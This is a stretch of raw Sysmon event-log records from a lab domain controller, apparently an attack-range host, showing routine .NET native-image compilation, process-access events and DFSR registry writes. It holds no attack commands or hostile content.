13:19:42.499{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44EE-6000-3801-000000009A01}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:42.499{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-44EE-6000-3801-000000009A01}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:42.499{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-44EE-6000-3801-000000009A01}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:44.436{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:48.921{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44F4-6000-3A01-000000009A01}5036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:48.905{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-44F4-6000-3A01-000000009A01}5036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:48.905{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-44F4-6000-3A01-000000009A01}5036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:19:48.671{08A6967A-44EE-6000-3901-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\120c-0\System.Xml.dll2021-01-14 13:19:48.671 10341000x80000000000000005310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:49.062{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44F5-6000-3B01-000000009A01}1036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:49.062{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-44F5-6000-3B01-000000009A01}1036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:49.062{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-44F5-6000-3B01-000000009A01}1036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:56.531{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44FC-6000-3C01-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:56.515{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-44FC-6000-3C01-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:56.515{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-44FC-6000-3C01-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:19:56.250{08A6967A-44F5-6000-3B01-000000009A01}1036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\40c-0\System.Core.dll2021-01-14 13:19:56.250 10341000x80000000000000005321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:57.500{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44FD-6000-3E01-000000009A01}4916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:57.484{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-44FD-6000-3E01-000000009A01}4916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:57.484{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-44FD-6000-3E01-000000009A01}4916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:57.422{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44FD-6000-3D01-000000009A01}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:57.422{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-44FD-6000-3D01-000000009A01}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:57.422{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-44FD-6000-3D01-000000009A01}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:19:57.344{08A6967A-44FC-6000-3C01-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\126c-0\System.Configuration.dll2021-01-14 13:19:57.344 10341000x80000000000000005325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:58.812{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44FE-6000-3F01-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:58.812{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-44FE-6000-3F01-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:58.812{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-44FE-6000-3F01-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:19:58.719{08A6967A-44FD-6000-3E01-000000009A01}4916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1334-0\System.Drawing.dll2021-01-14 13:19:58.719 13241300x80000000000000005331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:19:59.469{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\E353614F-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_E353614F-0000-0000-0000-100000000000.XML 13241300x80000000000000005330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:19:59.453{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2F6F85D1-BD71-4F32-93CC-49B3DCE2851F\Config SourceDWORD (0x00000001) 13241300x80000000000000005329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:19:59.453{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2F6F85D1-BD71-4F32-93CC-49B3DCE2851F\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_2F6F85D1-BD71-4F32-93CC-49B3DCE2851F.XML 10341000x80000000000000005328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:59.109{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-44FF-6000-4001-000000009A01}4256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:59.094{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-44FF-6000-4001-000000009A01}4256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 